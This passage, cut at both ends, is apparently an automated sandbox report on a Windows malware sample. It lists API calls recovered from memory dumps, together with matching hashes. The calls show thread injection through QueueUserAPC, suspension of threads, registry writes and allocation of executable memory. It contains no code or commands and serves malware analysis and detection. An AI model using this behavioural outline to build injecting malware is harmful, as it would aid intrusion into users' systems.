    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
